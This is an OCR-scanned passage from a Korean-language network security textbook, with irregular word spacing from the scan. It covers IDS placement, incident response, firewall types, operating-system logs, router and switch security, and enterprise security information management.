울타리밖(실 례 로 방화벽밖)에 망형 IDS 를 배 치하면 외 부의 공격 그리 고 내 부로부터 개 시 
되였지만 울타리밖에서 겨누어 조종한 공격들도 감시해 낼수 있다. 반대로 IDS 를 보안울 
타리안에 설치하면 성공한 침 입을 발견해 낼수 있다. IDS 를 방화벽바깥과 안쪽에 다 설 
치 하면 방화벽규칙(방책)시 행 을 효과적 으로 감시할수 있다. 그것은 이 렇게 되면 방화벽바 
깥에 서 의 활동과 성 공적 인 침 입사이 의 차이 를 알수 있기 때 문이 다. 

IDS 를 배치할 때 그 운영방식 즉 실시간방식 ( IDS 정보가 실시간적으로 분석되는것)인 
가 아니 면 시 간격방식(정 보가 일정한 시 간간격 으로 보내져 오프라인 분석 되 는 방식)인가 
를 결정하여 야 한다. 실시 간분석 은 여 러 원천으로부터 정 보가 끊임 없 이 흘러 들기 때 문에 
IDS 에 서 즉시 적 인 행 동이 주어 지 는것 을 의 미한다. 시 간격 혹은 오프라인분석 은 침 입 관 
계 정보가 앞으로 분석 하기 위해 보관된 다는것 을 의 미한다. 
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이 것 들중에 서 어 느것 을 선택하겠는가 하는 문제 는 IDS 정 보의 필 요성 에 기 초한다. 즉 
시적 인 행동이 필요하면 실시 간방식 에 쓰이는것 이며 분석 이 일없다면 일괄처 리방식의 정 
보수집 이 유리할것 이 다. 

사건대응 

IDS 는 의 심쩍 은 활동들을 탐지하는데 유리하다. 우에 서 설명된바와 같이 IDS 는 침 입 
관계정보들을 기록하고 전송한다. 보안관리는 이 정보들을 적중한 형태로 기록하고 분석 
할것을 요구한다. IDS 에 의해 발견되는 그 무엇도 (그것 이 공격 이든 침 입 이든 허위경 보 
이든) 모두가 사건으로 되여 분석하고 행동을 촉발시킨다. 사건의 중요성은 그 사건이 
주는 위험성에 따라 결정된다. 

침입사건이 일어 났다고 생각되는 경우 보안기관은 신속히 대응하고 긴급히 행동하 
여 침입을 억제하고 그 침입에 의한 피해를 제한하며 피해를 복구하고 전체 체계를 원래 
의 가동상태로 복구하여 야 한다. 

일 단 사태 가 가라앉으면 원인분석 을 하여 공격의 성격 을 판정하며 이 정 보를 리용하 
여 앞으로 있을수 있는 공격에 대처한 방어망을 개선하는것이 중요하다.《찾은 교훈》 
을 보안집행과정에 적용하지 않는다면 그 기관은 앞으로의 공격과 략랄행위에 자신을 내 
맡기는것 이 나 갈다. 

일반적으로 사건대응과정은 탐지，대응，수리，예방에 기초한 체계적인 과정으로 되 
여 야 한다. IDS 는 탐지 를 하고 사건에 대 하여 경 보를 울린다. 사건에 사람이 개 입하여 
대 응하고 수리 를 진행하며 엄 은 교훈으로 보안을 갱 신하도록 한다. 

IDS 는 공격과 침입에 정확히 대응할수 있는 설정을 잘해야 사건관리를 더 잘할수 
있게 된다. 이 대응에는 피동적인것(실례로 사용기록부에 기록하는것)도 있고 능동적인것 
(실례 로 보안관리자에 게 경 고문을 보내 는것)도 있 다， 

능동대응은 람지된 침입형태에 따라 자동화된 행동을 하는것이다. 일부 경우 IDS 는 
공격 적 인 파케트들을 모두 죽임 으로써 공격 을 저지시키게 설정해 놓는 경 우도 있다. 또 
한 경로기와 방화벽의 설정을 고쳐 주어 공격자가 사용하는 포구봉사형태，규약들을 차 
단시 킴 으로써 공격 자의 접 속을 종결 시키 는 경 우도 있 다. 또한 발신자주소나 수신자주소 
에 기초하여 망자료통신을 차단시키기도 하며 필요한 경우 해당 대면부를 통한 모든 접 
속을 다 차단하기도 한다. 

능동대 응에 서 가장 공격 성 이 약한 부분은 보안관리자에 게 경 고를 보내 는것 이 다. 그 
러 면 보안관리자는 공격 과 관련한 사용기 록부의 정 보를 검 토한다. 분석해 보면 공격 의 
성격과 필요한 해당 대응의 성격을 인차 알수 있다. 이 분석결과에 기초하여 이 IDS 의 
민감도를 조절하여 대응필요성에 부합되게 할수 있을것이다. 

이 렇게 하자면 체 계의 민감도를 높여 보다 넓은 범위의 정 보를 수집하여 야 공격 이 
실 지 일 어 났는가를 정 확히 진 단할수 있 다. 이 정 보를 수집하면 후에 도 공격 을 조사할수 
있으며 필요하면 법적증거로도 될수 있다. 

공격에 대응하는 다른 방도들도 있는데 그중 하나는 맞받아 싸우는것 이다. 공격자에 
대한 정보수집，공격자에 대한 공격을 가하는것 등은 그 단적 인 실례들이다. 일부 사람들 
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에게 상당히 매력 있게 보이지만 이런 형태의 수법은 오직 공격자에 대한 정보수집의 범 
위에서만 리용되여야 한다. 

공격이라고 생각되는것에 대하여 적극적으로 공격을 가하는것은 그 잠재적인 위험성 
이 크다. 실례로 통신발신자의 IP 가 위조되였다고 가정하면 마지막공격지는 공격원천이 
아니라 공격의 발판으로 된셈이다. 또한 이것은 법적인 문제도 안고 있다. 그렇기때문에 
이쯤알고 전문가들은 자기의 법적경계선을 명백히 알고 그 경계를 넘지 않도록 주의해야 
할것 이 다. 

오늘날의 상업화된 대부분의 IDS 들은 공격정보를 기록부에 기록하고 경보를 울리는 
피동대 응식체 계들이다. 이것은 항상 사람이 개 입하여 IDS 정 보에 대 응할것을 요구하는 체 
계이다. 이런것들은 경보신호，통지신호， SNMP (단순망관리규약)통보문의 형태이다. 경보 
나 통지 는 공격 이 탐지 되 였을 때 발생하는데 를퓨터화면에 하나의 창으로 튀 여 나오거 나 
전자우편통보문으로 보내 여 지 든가 아니 면 이 동전화나 휴대 형호출기 에 경 고신호를 보내 
는 식 으로 발신된다. 일부 업 체의 IDS 들은 사용자에게 일정한 정도의 선택점 을 주어 의 
심되는 전송자료들을《적극적으로 죽일수 있게》한다. 

망으로 경 보정 보를 내 보낼 때 많은 체 계 들은 SNMP 통보문들을 리용하여 망관리 체 계 
에 경 고를 내 보낸 다. 현재 하나의 조종탁을 통하여 보안사건들을 공고화하고 관리하는 
보안관리체계가 시장실현되고 있는것으로 생각된다. 이러한 체계의 우점은 그 총체성성 
격이 므로 망하부구조전반이 공격 대응에 중요한 역 할을 수행할수 있게 하는것 이 다. 널 리 
인정 된 많은 망관리 체 계 들이 현재 이 요구를 충족시 키 기 위하여 자기 들의 체 계 들에 보안 
전용 모둘들을 합장하고 있다. 

IDS 기술이 충분한 보안능력이 있는가 

보안관리 에 서 IDS 의 역 할과 사건대 응의 역 할을 다 리해한바와 같이 IDS 의 기 술은 
그정 도가 전부이 다. 즉 경 보를 울리 고 보안관련사건을 기 록하며 불쾌한 전송자료들은 일 
정한정 도로 적 극적 으로 살상하는 능력 이 다. 기 업 전반에 걸 쳐 IDS 가 생 성하는 정 보들을 
리용하면 보안사업개 선을 위한 권위 있는 결정 들을 채 택할수 있 다. 

아무리 정교한 최신 IDS 를 가지고 있다 해도 전문가들의 사건분석이 있어야 대응 
및 관리공정 을 향상시 킬수 있는 사활적 인 자료를 쥘 수 있 다. 경 보울린사건 이 일 단 포착 
되고 위험사건으로 판정되면 사건대응림은 재빨리 대응하여 그 사건이 더 번져 가지 않 
으며 망과 체계들이 그 어떤 있을수 있는 피해를 받지 않도륵 하여야 한다. 이 시점에서 
법 정토론술의 역 할이 발휘 된 다. 토론술전문가들은 사고의 원 인과 결과를 판정 하기 위한 
구체 적 인 분석 을 진행한다. 이 토론된 분석 의 결 과자료들을 가지 면 대 답을 찾는데 필 요 
한 정 보를 얻 을수 있 다. 이 정 보를 가지 고 적 대공격，봉사거 부공격，정 보기 술람용 등과 
갈은 여 러 가지 부류로 분류하면 통계 적자료도 얻 을수 있 으므로 앞으로의 사고처 리대 응을 
보다 높은 수준에서 할수 있게 될것 이 다. 

마지 막으로 이 정 보를 리용하여 분석 과정 에 서 포착된 약점 들을 처 리 할 필 요도 있 을 
것 이 다. 이 러 한 부족점 들은 체 계 와 망에 있 는 기 술적 취 약성 이 나 제 한성 일 수도 있 고 방책 
이 나 절차와 갈은 행정통제사업 일수도 있다. 앞으로 있을수 있는 사건들을 미 리 잘 접종 
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함으로써 재발의 위험성을 막아야 할것이다. 한가지 문제점이 있다. 지난번의 감염에서 
교훈을 찾지 않아 동일한 비루스와 싸우지 않으면 안되는 보안전문가들이 얼마나 되는가. 
일이 번져 진 다음에 하는 일들도 보안태세향상에 도움을 주며 찾은 교훈을 분간하여 보 
안의식을 높이는데 큰 역 할을 할것 이 다. 

기 타 IDS 관리의 문제점으로서는 IDS 를 갱신하고 동조시켜 최신공격들을 잡아낼뿐아 
니 라 허위경 보들도 려과하도록 하는것 이 다. 모든 체 계 에서 그러한것 처 럼 IDS 를 항시 적으 
로 유지 보수해 야 IDS 가 생 성하는 정 보가 실 용성 있게 된 다. 

방화벽의 형태와 보안실시에서 노는 그 역할 


이 부분에서 는 방화벽들과 정보보호에서 그것 이 노는 역 할을 각이한 형 태의 방화벽 
과 보안관리에서 그 우단점과 결부하여 개괄한다. 

소개 

방화벽 은 지 역 간의 접 근을 조절 함으로써 서 로 다른 망지역 간에 보호를 보장하는 도 
구이 다. 일 반적 으로 방화벽 은 해 당 규칙 에 토대하여 특정한 봉사형 태 나 응용을 려 과하며 
망경간들사이 의 접 근을 조종함으로써 정 보를 보호해 준다. 

방화벽은 다음과 갈은 주요장점을 가지고 있다. 

• 공통의 접근점을 통하여 보안을 공고화하는 능력. 방화벽이 없는 경우에 보안능 
력은 오직 해당 호스트나 망장치들에 의하여 수행된다. 이렇게 공고화하면 보호 
되 는 경간들에 서 중앙집 권적 인 접 근관리 를 실 현 할수 있 다. 

• 단일 접 근점 으로서 방화벽 은 망전송내 용을 기 록하는 점 으로도 된 다. 방화벽작업 
기록철은 방화벽을 통과하는 전송자들의 성격에 대한 정보를 제공하므로 그 내 
용은 다양하다. 이러한 전송내용은 침입과 관련한것일수도 있으므로 이것을 분 
석하면 해당 보안위험사항들의 성격을 료해할수 있다. 

• 방화벽뒤 에 있는 내부망의 성격을 감추는 능력(이것은 사적비밀보장에 큰 도움 
이 된다). 

• 외부의 략랄위험을 받지 않고도 방화벽뒤에서 봉사를 제공할수 있는 능력. 

핵 심적 인 보안기능을 수행하지만 방화벽은 기 관의 보안을 담보하지는 못한다. 보안 
이 효과적인것으로 되는가 하는것은 해당 보안공정과 절차들을 비롯하여 보안이 어떻게 
관리되는가에 달려 있다. 또한 방화벽의 설정과 관리를 담보할수 있는 준비된 인원들이 
있어 야 한다. 

전반적인 방화벽이 기관의 보안을 향상시키는데 도움을 주지만 여기에는 일련의 단 
점이 있다. 이러한 결함들로서는 일부 종류의 봉사와 호스트들이 망접속을 제대로 하지 
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못하여 유일한《실패점》으로 되는 현상을 대표적으로 볼수 있다. 

방화벽설정에는 주로 두가지 방법이 있다. 즉 

• 거절하게끔 설정된것들만 제외 하고 모든것(파케트와 봉사)을 다 허용하는것 

• 허용하게끔 설정된것들만 제외 하고 모든것(파케트와 봉사)을 다 거절하는것 

《 모든것 을 다 허 용하는》방책 은 조종적 접 근에 대 하여 일 정 하게 제 한시 키 려 는 요구 
와 어긋난다. 표준적으로 대부분의 방화벽들흣《허용하게끔 설정된것들만 제외하고 모 
든것을 다 거절하는》방책을 실시 한다. 

방화벽의 형태 

파케트려과장치. 파케트를 려과하는 방화벽들은 IP 층에서 기능을 수행하여 파케트형 
태를 검열 함으로써 보안방책 에서 허용된것 들만 통과시 키 고 기 타는 일체 무시 하는 작용을 
한다. 파케트를 려과한다는것은 파케트형태，발신자 1 P 주소와 수신자 IP 주소 혹은 발신자 
TCP/UDP 포구들에 기 초한 려과라는것 을 의 미한다. 대 표적 으로 보면 파케 트려과는 경 로기 
로 수행 한다. 

파케트려과의 기본장점은 상대적으로 값눅으면서도 높은 준위의 성능으로 보안을 보 
장한다는것 이 다. 또한 그것 을 사용하는것 이 사용자들에 게 는 항상 투명 하다는것 이 다. 

그러나 파케트려과는 약점도 있는바 그것은 다음과 같다. 

• 설정 하기 가 보다 힘 들며 그 설정 을 확인하는것 은 더 욱 힘 들다. 설정오유의 가 
능성이 높으면 보안상 구멍의 위험성도 높아 진다. 

• 사용자준위의 인증은 지원하지 않으며 시각에 기초한 접근도 허용하지 않는다. 

• 다만 제 한된 검사능력만 있으며 국부망을 외부세계 로부터 숨기는 능력은 없다. 

• 망층보다 더 높은 규약을 겨눈 공격 에 는 취 약하다. 

응용프로그람관문. 응용프로그람관문들은 응용층에 서 작용하여 파케트러 과보다 더 세 
밀하게 전송내용을 조사한다. 해당 대리자가 있는 봉사에 한해서만 통과를 허용한다. 대 
리 자봉사들은 또 그것 대 로 오직 믿 음직한 봉사들만 방화벽 으로 통과허 용되 게끔 설정된다. 
새로운 종류의 봉사들은 자기들의 대리자가 규정되여야 비로소 통과허용을 받을수 있다. 

일 반적 으로 응용프로그람관문들은 파케 트를 려 과하는 방화벽보다 더 안전하다. 

응용프로그람관문들에 토대하는 방화벽 의 주요우점 들은 다음과 같다. 

• 내부망이 밖에서 《 보이지》않으므로 정보숨기 기를 잘할수 있다. 실지 응용프로 
그람관문들은 내부망구조를 숨기는 기능이 있다. 

• 인증과 기록을 할수 있으며 내부적인 우편전달을 중앙집권화할수 있게 한다. 

• 검 사능력 이 있 어 발신 자주소와 도착지주소，넘 겨 진 정 보의 크기，시 작 및 끝시 
간，사용자신원과 갈은 정보의 추적 이 가능하다. 
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• 하나의 봉사내에서 일련의 명령들에 대한 려과를 정교하게 시행시킬수도 있다. 

례하면 FTP 응용프로그람관문에 는 Put 와 get 명 령 을 려 과하는 능력 이 있 다. 

응용프로그람관문의 결정은 의뢰기 와 봉사기의 련결 이 두 단계적 인 공정 이 라는것 이 
다. 그 관문들의 작용내 용은 사용자에 게 투명치 않다. 또한 전송내 용의 검 사범 위 때 문에 
응용프로그람관문들은 대체로 파케트러과보다 속도가 느리다. 

방화벽관리의 문제점들 

보안실천 이 잘되 자면 방화벽활동이 끊임 없 이 기 록되 여 야 한다. 안전한 망을 통하여 
안팎으로 나드는 모든 전송자료들이 방화벽을 거치며 기록부의 정보를 보고도 전송의 성 
격，사용패런，수신지와 발신지 등에 대하여 상당한 정도로 인식이 서게 된다. 또한 기록 
부정보의 분석 을 통하여 보안계 획 작성뿐아니 라 망리용애 까지 이 르는 수많은 귀 중한 통계 
학적자료들도 쥘 수 있 다. 

필요하다면 방화벽 이 일정한 정 도의 침 입탐지 기 능도 가질수 있 다. 적 중한 경 보장치 
로 설정을 잘해 놓으면 방화벽은 자기와 망이 공격이나 람색당하는가 아닌가에 대한 훌 
륭한 정보제공원천으로 될수 있다. 이것은 IDS 와 함께 쓰는 경우 훌륭한 보안적역할을 
놀수 있을것이다. 

망용도통계자료와 탐색의 증거는 여러 목적에 쓰일수 있다. 1차적인 중요성을 가지 
는것이 바로 방화벽이 외부의 공격에 견딜수 있는가 없는가 하는 문제의 분석과 방화벽 
에 있는 통제 기 능들의 강력한 보호기 능을 수행 하는가 못하는가를 결정하는것 이 다. 

망용도통계자료들은 망요구사항연구와 위험분석활동에서 주요한 입력자료로 된다. 
공격 및 침습에 대 한 연구의 최 신수법 들에 는《 끌통》수법 이 라는것 도 있는데 이 수법 은 
전송방식，있을수 있는 공격，이러한 공격들의 성격 등을 연구한다. 여기에서는 이미 알 
려 진 취 약점들을 담은 《 끌통》을 배 치하여 침 입시도，그 성 격，성공여부，공격발원지 
등을 잡아 낸다. 이 끌통식분석 수법 으로는 공격 자들의 공격 동기，해 당 공격 형 태의 성 공률 
등을 결정해 낼수 있 다. 

방화벽보안이 충분한가. 

방화벽 을 설 치 하고 설정한 후에 는 나앉아서 방화벽 의 정 보가 다 안전하다고 만족감 
을 가지는 기관들이 허다하다. 실생활에서 방화벽은 하나의 큰 정문과 류사하여 대부분 
의 침입자들이 구멍만 찾아 내면 들어 오기 쉬운것이나 같다. 실지 침입자가 에돌아 들 
어 오거 나 불법리용하여 방화벽 을 뚫고 들어 와 내 부망에 접 근할수 있는 방도는 많다. 
이런것들로는 규약 혹은 응용프로그람특유의 약점을 교묘하게 리용하는것과 내부망의 안 
팎을 통하는 예비적인 통로가 있는 방화벽을 에돌아 가는것 등이 있다. 

현실적으로 최상의 보안을 담보하는 문제들이란 다름 아닌 공정들과 사람들 그리고 
기 술에 귀 착된 다. 기 술도 좋다. 그러 나 그 기 술을 관리할 사람이 있 어 야 한다. 그리 고 보 
안과 보안을 실 시하는 사람을 관리해 야 할 공정 도 있 어 야 한다. 

392 




주요 공정들은 다음과 갈다. 

• 쏘프트웨 어의 시간갱신과 판본갱신의 적용 

• 보충프로그람의 구입과 적용 

• 방화벽을 잘 설정하여 기록철들을 묶고 그 정보를 수집하는것 

• 보안에 예민한 문제들에 대한 기록정보의 후열 

• 기록정보를 망의 다른 보안장치의 정보들과 호상 련결시켜 보는것 

• 보안정보에서 밝혀 진 조사결과들을 결정하고 그 결과들에 대응한 행동을 취하 
는것 

• 이 주기들을 반복하는것 


조작체계기록파일 


여 기서는 조작체계 기록철 ( log ) 이 란 무엇 이며 왜 필요한가 하는것，기록철정 보수집방 
법，체 계기록철관리전략，기록철정보관리 에서의 난점들, 체계 안전에 주는 영 향들을 종합 
적으로 보여 준다. 

소개 

조작체계기록철은 체계정보의 수집과 분석에서 하나의 중요하고도 유용한 도구이다. 
이 기록철은 체계활동과 관련한 귀중하고도 세부적인 정보를 제공해 준다. 체계기록철은 
사용자，보안，체 계 관련사항，응용프로그람관련사항들을 비 롯한 일정 한 활동정 보를 기 록 
하는 여 러가지의 부류로 나누어 진다. 

이것들은 진행중인 조작과정을 지원하며 체계의 활동흔적을 제공해 준다. 이것을 리 
용하여 체계가 손상이 갔는가를 결정할수 있게 해주며 범죄활동이 있는 경우 법정에서 
중요한 증거문건으로 된다. 

기록철의 류형，용도，우점들 

조작체계를 검사하면 체계활동，응용프로그람의 활동，사용자활동에 관한 정보가 모 
두 기록철에 기록된다. 조작체계에 따라 여러가지 이름으로 기능을 수행하나 매 기록철 
은 자기 부류에 해당한 활동을 기록하는 책임을 가지고 있다. 체계는 활동기록을 두가지 
방법 으로 한다. 즉 사건형기록과 타건형기록(타건감시)이 있다. 

사건형기록은 체계，응용프로그람 혹은 사용자의 활동과 관련한 정보를 담는다. 그리 
하여 사건이 일어 나면 사건에 대하여，그 사건과 관련한 사용자 ID , 그 사건에 어떤 프 
로그람이 사용되였는가 하는것과 그리고 그 최종결과까지 알려 준다. 

타건감시 는 특수한 형 태의 체계기록철 이 라고 볼수 있다. 이것을 둘러 싸고 법적문제 
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까지 생길수 있다. 사용하기전에 이것을 잘 알아야 한다. 이런 검사방식을 쓰면 사용자가 
건반을 칠 때마다 기록된다. 때로는 건반칠 때의 콤퓨터의 반응도 기록된다. 이런 체계기 
륵은 침입자가 콤퓨터를 파괴했을 때 그것을 수리하는 체계사용자에게 매우 유용하다. 
체계기록정보를 리용하여 체계의 성능도 감시할수 있다. 

구동프로그람적재，공정，봉사시작，처리률과 갈은 활동은 체계관리자가 체계를 세밀 
조절할수 있는 귀중한 정보이다. 또한 이 기록철들은 체계접근에 대한 정보와 어떤 프로 
그람들을 자극시켰는가에 대한 정보를 잡을수 있다. 

사용자활동과 관련되는 사건들을 모으면 개인의 책임소재가 성립되며 성공하였거나 
성공하지 못한 인증시도에 대한 기록도 알수 있다. 이 기록철을 보면 사용자가 시행시 킨 
명령들에 대한 정보，어떤 자원이나 파일에 접근하였는가 하는것도 알수 있다. 보충적인 
세밀도가 필요하면 파일읽기나 변경과 갈은 응용프로그람내의 세부활동도 기록할수 있다. 
응용프로 그람기록부는 응용프로그람내 에 결함이 있는가 또한 어떤 응용프로 그람전용보안 
규칙들이 위반되였는가를 결정하는데 쓰이기도 한다. 

이 검사기록부들의 좋은 점을 말하자면 끝이 없다. 사용자관계사건들을 기록함으로 
써 개인의 책임소재를 성립시킬수 있을뿐아니라 사용자들로 하여금 자기들의 활동이 낱 
낱이 기록된다는것을 알게 하여 금지된 령역에 감히 들어 가지 못하도록 할수도 있을것 
이 다. 체 계 기 록철들은 접 근조종체 계 와 침 입 방지 체 계 와 같은 다른 보안체 계 들과 협 동하여 
사건들에 대한 보다 심화된 분석을 가할수도 있다. 가동이 중지되는 경우 기록철을 잘 
리용하면 그 사건을 유발시킨 활동을 찾아 내고 더 나아가서 그 근원을 밝혀 낼수도 있 
을것 이 다. 

물론 이 기록철이 리용성이 높자면 기록들이 모두 정확하며 그에 대한 해당한 조종 
을 강화하게끔 되여야 한다. 또한 그 기록철의 무결성이 보호되여야 하며 기록철에 기록 
된 약점이나 결점이 잘못된 대상에 알려 지는 경우 그 정보의 로출은 큰 부정적후과를 
가져 올것이다. 많은 경우 조작체계기록철 즉 검사기록철은 침입자나 내부사람들의 공격 
대상으로 될수 있다. 

관리에서의 난점들과 영향 

조작체계기록파일들은 의심 할바없이 우리 체계들의 매우 중요한 부분이 다. 그러 나 수 
집되는 정보량은 효과적으로 관리하기 매우 힘들다. 기록파일에 담겨 진 정보들은 거기에 
담겨 진 비정상행위들을 정기적으로 검열하지 않는다면 실지 무용지물이 되고 만다. 이것 
은 한사람은 더 말할것도 없고 여러 사람이 모여 검열하기에는 아름찬 과업인것이다. 검 
열자들이 정보를 정확히 해석하고 해당 행동을 취하려면 어떤 비정상적인 배척사건을 찾 
고 있는가를 잘 알아야 한다. 기록된 사건들중에서 비정상행위로 되는 추세，형태，변종들 
을 찍어 밝혀 낼수 있게 되여야 한다. 매일 기록파일에 기록되는 정보의 량을 타산해 보 
라. 이 정보를 효과적으로 관리할 책임을 보안전문가 한사람에게 맡긴다면 그 힘든 정보 
는 너무나도 뻔하다. 한사람 혹은 한 그룹이 전문으로 해야 할 일량이 쉽게 될것 이 다. 

만일 이 방대한 량의 정보관리로 하여 보안전문가가 쓰러 져 휴가밤으면 정보의 보 
관과 가공에 드는 비용은 더 말할것도 없고 이 정보수집기간 체계에 어떤 영향이 미치겠 
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는가 하는것을 상상하기 어렵지 않다. 

다행히도 이 모든 정보를 계속 관리 할수 있는 분석도구들도 있다. 검사정 리도구들을 
쓰면 정상운영과 관련된 활동들과 갈은 보안상 후과가 적은 사건들을 제거하여 남은 정 
보를 중시함으로써 자료량을 줄일수 있을것이다. 침입탐지체계기능들과 류사한 경향/변화 
탐지 도구들과 공격 표적 탐지 체 계 들은 가능한 모든 원자료들에 서 유용정 보를 추출해 낼 것 
이다. 


결론 

조작체계기록파일들은 기관의 체계들과 자원들에 대한 기술적인 보관관리에서 귀중 
한 수많은 유효정보들을 그 값을 물지 않고 제공할수 있다. 이러한 정보들을 값 있게 관 
리하자면 시간，콤퓨터자원을 다 바쳐 그리고 고심분투하여 나가야 할것이다. 

기타문제 : 경로기와 교환기 


경로기와 교환기는 기업망에서 실로 중요한 역할을 논다. 경로기는 서로 다른 망토 
막들을 련결시키며 한 토막에서 다른 토막에로의 전송흐름을 경로조정해 준다. 망에서 
결정적 인 지 점 들에 《 앉아 있 다》고 말할수 있 다. 경 로기 는 망조각들을 서로 붙이는 풀 
이라고 볼수 있다. 가장 간단한 망에서조차 이것은 간단한 작업이 아니다. 

경로기처럼 교환기들도 망에서 결정적인 요소들이다. 교환기는 하나의 망에 해당된 
전송흐름을 분류하여 망토막들을 갈라 준다. 교환기와 경로기는 실질적인 콤퓨터의 능력 
을 가진 일정하게 복잡한 기구로 변화되여 가고 있다. 또한 교환기와 경로기가 망기능에 
서 노는 결정적인 역할로 하여 보안에 주는 영향역시 결정적이다. 경로기들은 고도로 전 
문화된 콤퓨터가동환경으로 변화되여 고도의 유연성과 복잡성을 가지게 되였다. 이러한 
복잡성 으로 하여 취 약성 이 생겨 나고 결과 공격도 자주 받게 되는것 이 다. 

경로기，교환기와 관련된 문제점들은 다음과 같다. 

• 접근 그 장치에 누가 어떤 접근를 하였는가. 

• 설정 설정을 어떻게 하여야 장치의 보안이 담보되는가. 

• 성능 배 치된후 소여요구사항들을 만족시키기 위 하여 얼마나 잘 동작하는가. 

우의 사항들에 대 한 정보를 추적 하여 망장치들과 그 성능들의 《 건강》을 확인하는 
것은 흥미 있다. 장치건강상태를 확인한다는것은 장치가 원래의 목적에 기초하여 기능을 
계속 수행하고 있는가를 확인한다는것을 의미한다. 장치들의 변화와 성능을 주시할뿐아 
니라 그 변화들이 합법적으로 승인받은것인가와 그 장치의 보안에 주는 영향을 정확히 
알아야 한다. 

경 로기 와 교환기 를 관리하는 문제 는 방화벽 과 IDS 와 같은 망장치 를 관리하는 문제 
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와 류사하다. 방화벽 이나 IDS 와 같이 교환기와 경로기들은 응당한 관심을 돌릴것을 요구 
한다. 즉 이상한 행동들을 사용기록파일에 기록하여 필요한 경우 경보를 울리며 장치를 
보호하기 위하여 기 록파일 들에 기 록된 활동들을 정 상적 으로 검 열 해 보아야 한다. 

방화벽과 IDS 를 사용할 때처럼 사용자들은 경로기와 교환기들이 기정설정값으로 설 
치 하지 않도륵 하여 야 하며 장치시 간갱 신과 추가보충과정 이 반드시 있게 끔 하여 야 한다. 

표준적으로 교환기와 경로기는 내부망에서 쓰인다. 이런데로부터 많은 사람들은 교 
환기 와 경 로기 가 기 관울타리 에 설 치하는 장치 보다 낮은 수준의 보호밖에 제 공하지 못하 
는것으로 생각하군 한다. 사실상 울타리가 안전하면 그 내부의 보호수준이 반드시 낮겠 
구나 하고 생각하는 사람들이 없지 않다. 이것은 대부분의 공격사건의 원천이 내부망이 
라고 생각하는 그릇된 보안관념에서 출발한것이다. 더우기 공격이 성공하는 경우 침입자 
는 내 부망장치 들의 보호가 충분하다고 해 도 제마음대 로 만들어 놓을것 이 다. 

더 있다. 망의 내부와 외부사이의 경계가 계속 흐려 지고 있다. 표준적으로 한 기업 
이 가지 고 있는 망은 인트라네 트，엑 스트라네 트，내 부망과 인 터네 트로 구성 되 여 있 다. 가 
장 약한 고리를 처야 보안사슬이 끊기게 된다. 기업대상자와 그 기업을 련결시키는 경로 
기 나 교환기 가 가장 약한 고리 로 될수 있 다. 그러 므로 이 장치 들을 안전하게 관리하는데 
많은 관심 을 돌려 야 한다. 

경로기나 교환기에서 얻은 보안정보는 반드시 기업보안정보총체의 한 부분으로 되여 
야 한다. 그렇 게 하여 야 기 업보안태세 에 대 한 전면적 인 모습을 그릴수 있을것 이 다. 

기업정보관리전략 


기 업정보를 관리 한다는것은 기 업보안 및 위 험 관리 자들에게 상당한 애 로를 주고 있다. 
그 애 로에 는 수없 이 많은 망장치 들이 생 성하는 방대한 량의 정 보，그 정 보의 분석，보안 
사건과의 호상관계수립，기술적위험과 기업위험과의 호상관계의 설정 등이 속한다. 또한 
보안 및 위 험 관리 자들은 이 보안관계활동들을 끊임 없 이 진행하여 야 기 관의 보안상태 를 
손금보듯 알수 있으며 그 상태의 개선방도를 찾을수 있게 된다. 

기업보안태세를 잘 파악하려면 각이한 원천에서 나오는 정보들을 의미별로 종합하고 
호상 련결시 켜 야 한다. 그 다음에 그것 들을 분석해 보면 그 정 보에서 특징 적 인 방식，경 
향，성 능지표들을 알수 있 다. 

방식들을 보면 체계리용률의 측면들을 알수 있게 된다. 이 측면들은 또 기 업보안개 
발계 획 및 유지 관리공정의 성격을 반영하게 된다. 한편 경 향을 보면 일정한 기 간내 에 보 
안의 여러 측면에서의 변화를 알수 있다. 이것들은 다 실현된 개선항목들을 보여 주며 
또한 개 선해 야 할 문제 성 있는 분야들을 가리켜 준다. 성 능지표들과 방식 들은 또한 원 인 
분석과 문제해결에도 도움을 준다. 

보안 및 위 험 관리 에서 나서는 가장 어 려 운 과업은 기 업 내의 각이한 망장치들에서 수 
집 된 정 보를 분석하는것 인데 그 장치 들은 다 각이하나 호상 보충완성하는 보안기 능들을 
발휘한다. 실례 로 방화벽，침 입람지체 계, 체계기록파일에서 오는 정보들은 보안상 서 로 
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보완적인 성격을 띠고 있다. 이 각이한 원천의 정보들을 정확한 련관관계로 맺어 준다는 
것은 아직은 주요애로들중의 하나이 다. 

수집된 방대한 량의 정보처리문제를 제쳐 놓고 보더라도 그 분석과정을 쉽게 할수 
있는 특수한 분석기법이 반드시 있어야 한다. 이 기법들은 변칙，호상관계，알려 진 로출 
과의 관계，경향 그리고 사용자자료 등에 기초한다. 이 기법들은 보안정보를 려과 및 수 
집하여 대량의 자료요소들을 결심책택에 필요한 유용정보로 전환시켜 준다. 

일반적으로 문제의 범위는 기술，공정，사람 그리고 기업이다. 이 문제들은 보안태세 
향상에 유용한 정보를 위한 이러한 총체속에서 고찰되여야 할 문제이다. 

이 부분의 뒤 에서는 보안정보관리 문제들과 보안정보관리 의 난점 타결 안들을 총괄적 으 
로 보기로 한다. 여기에서 취급되는 실천적문제들이 보안태세향상에 유익하지만 이 모든 
것을 다 구현하여야 기업보안전반에 개선을 가져 올수 있다. 정보보안실험자들은 보안이 
란 사회적 및 기술적인 측면을 다 포함한다고 본다. 이런것으로 하여 기관내의 관례와 
기준 특히 자체개선을 추동하는 관례와 기준들은 기 업보안향상에서 핵심으로 된다. 

보안자료수집과 기록부관리문제 점 

기업전반에서 보안관계정보의 수집，보관，분석은 기업보안의 경향성을 료해하는데서 
사활적이다. 관리자들은 기업운영에 도움이 되게끔 이 방대한 량의 정보를 관리할수 있 
는 방도들을 찾아야 한다. 구태여 찍어 말하면 기술적취약성자료를 기업위험으로 어떻게 
해 석할수 있 겠는가. 

려과를 잘 하지 못하여 기업에 절실한 정보만 골라 내지 못한다면 방대한 정보량에 
목이 멜수 있는 위험요소도 있다. 보안관계정보려과장치를 선택하는 문제는 경험에서 나 
오며 어떤 정보환경인가에도 달려 있다. 

보안필수정보들은 보존하고 불필요한 정보는 다 제거하는 식의 정보수집에도 난점이 
아직 남아 있 다. 실례 로 대 부분의 침 입탐지체 계 들은 IDS 의 수감부설정 에 대 하여 수많은 
허위긍정을 하는 현상이 있다. 사실상 그 탐지체계들이 생성하는 많은 정보들은 《백색 
소음》으로 분류될수 있으며 보안관리에는 의의가 그닥 없다. 보안관리자들에게는 적중 
